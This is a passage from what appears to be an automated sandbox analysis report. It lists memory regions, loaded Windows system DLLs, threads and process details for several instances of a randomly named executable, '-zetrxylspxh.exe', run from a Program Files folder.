"private_0x0000000000440000" filename = "" Region: id = 7016 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 7017 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7018 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7019 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7020 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7021 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7022 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7023 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7024 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7025 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7026 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7027 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7028 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7029 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7030 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7031 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7032 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7033 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7034 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7436 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7702 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7703 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 7704 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 234 os_tid = 0x1310 Thread: id = 262 os_tid = 0x10f0 Process: id = "72" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x797ca000" os_pid = "0xddc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6457 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6458 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6459 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6460 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6461 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6462 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6463 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6464 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6465 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6466 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6467 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6468 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6469 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6470 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6471 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6472 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6651 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6652 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6653 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6654 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6655 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6672 start_va = 0x5a0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 6673 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6674 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6675 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6676 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6677 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7052 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7053 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7054 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7055 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 7056 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 7057 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7058 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7059 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7060 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7061 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7062 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7063 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7064 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7065 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7066 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7067 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7068 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7069 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7070 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7071 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7072 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7073 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7074 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7455 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7699 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7700 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 7701 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 236 os_tid = 0xa08 Thread: id = 264 os_tid = 0x8b8 Process: id = "73" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb9cf000" os_pid = "0xd6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6477 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6478 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6479 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6480 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6481 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6482 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6483 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6484 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6485 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6486 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6487 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6488 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6489 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6490 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6491 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6492 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6705 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 6706 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6707 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6708 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6725 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6726 start_va = 0x610000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6727 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6728 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6729 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6730 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6731 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7104 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7105 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7106 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7107 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7108 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 7109 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7110 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7111 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7112 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7113 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7114 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7115 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7116 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7117 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7118 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7119 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7120 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7121 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7122 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7123 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7124 start_va = 0x77210000 end_va = 0x77253fff monitored = 